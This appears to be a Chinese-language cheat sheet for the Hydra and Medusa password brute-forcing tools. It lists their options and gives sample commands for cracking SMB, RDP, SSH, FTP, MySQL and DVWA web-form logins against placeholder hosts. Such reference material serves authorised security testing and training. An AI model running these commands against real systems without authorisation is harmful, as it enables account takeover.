Hydra

Hydra 参数 IP 服务

  1. 参数:
  2. -l login 小写,指定用户名进行破解
  3. -L file 大写,指定用户的用户名字典
  4. -p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
  5. -P file 大写,用于指定密码字典。
  6. -e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
  7. -M file 指定目标ip列表文件,批量破解。
  8. -o file 指定结果输出文件
  9. -f 找到第一对登录名或者密码的时候中止破解。
  10. -t tasks 同时运行的线程数,默认是16
  11. -w time 设置最大超时时间,单位
  12. -v / -V 显示详细过程
  13. -R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
  14. -x 自定义密码。

Windows密码破解

– hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vVd
– hydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV

Linux密码破解

– hydra -l root -P pass.lst ssh://1.1.1.1 -vV

其他服务密码破解

– hydra -L user.lst -P pass.lst ftp://1.1.1.1 -s 2121 -e nsr -o p.txt -t 64
图形化界面 – xhydra

  1. hydra -l admin -P pass.lst 1.1.1.1 http-post-form
  2. "/dvwa/login.php:username=^USER^&password=^PASS^&Login=L
  3. in:S=index.php" -V
  4. hydra -l admin -P pass.lst 1.1.1.1 http-post-form
  5. "/dvwa/login.php:username=^USER^&password=^PASS^&Login=L
  6. in:Login Failed" -V
  7. /foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H
  8. =X-Foo: Foo
  9. C:先访问指定页面取得cookie
  10. H:指定http
  11. https-post-formhttp-get-formhttps-get-form
  12. -S:使用SSL连接

pw-inspector

– 按长度和字符集筛选字典
– pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l
– pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u
密码破解效率
– 密码复杂度(字典命中率)
– 带宽、协议、服务器性能、客户端性能
– 锁定阈值
– 单位时间最大登陆请求次数

Medusa

Hydra 的缺点
– 稳定性差,程序时常崩溃 – 速度控制不好,容易触发服务屏蔽或锁死机制
– 每主机新建进程,每服务新建实例
– 大量目标破解时性能差
Medusa 的特点
– 稳定性好
– 速度控制得当
– 基于线程
– 支持模块少于hydra(不支持RDP)
– WEB-Form支持存在缺陷

  1. -h 目标IP地址
  2. -H 包含目标IP地址的文件
  3. -u 指定测试的用户名
  4. -U 指定测试的用户名字典
  5. -p 指定测试的密码
  6. -P 指定测试的密码字典
  7. -C 指定测试格式为"user:password"的字典
  8. -O 将输出结果保存在指定文件
  9. -e [n/s/ns] 额外的密码检测(n:空密码 s:用户名=密码)
  10. -M 指定执行的模块(不带.mod扩展名)
  11. -m 指定传递给模块的参数
  12. -d 查看支持破解的模块
  13. -n 指定非默认的TCP端口
  14. -s 启动SSL
  15. -g 设置连接超时时间(默认值3)
  16. -r 设置重试的次数(默认值3)
  17. -t 设置同时测试的登陆总数
  18. -T 设置同时测试的主机总数
  19. -f 在破解得到第一个用户名或密码后停止扫描主机
  20. -F 当在任何主机上破解得到第一个用户名或密码后停止扫描
  21. -b 不显示软件启动时的版本信息
  22. -q 显示模块的使用信息
  23. -v 详细等级(0-6)
  24. -w 错误调试等级(0-10)
  25. -V 显示版本信息
  26. -Z 回复中止的扫描
  27. 原文链接:https://blog.csdn.net/smli_ng/article/details/106096017
  1. medusa -d
  2. 破解windows密码
  3. medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F
  4. 破解Linux SSH密码
  5. medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns F
  6. 其他服务密码破解
  7. medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F
  8. medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m
  9. FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m
  10. FORMDATA:"post?user=username&pass=password&Login=Login"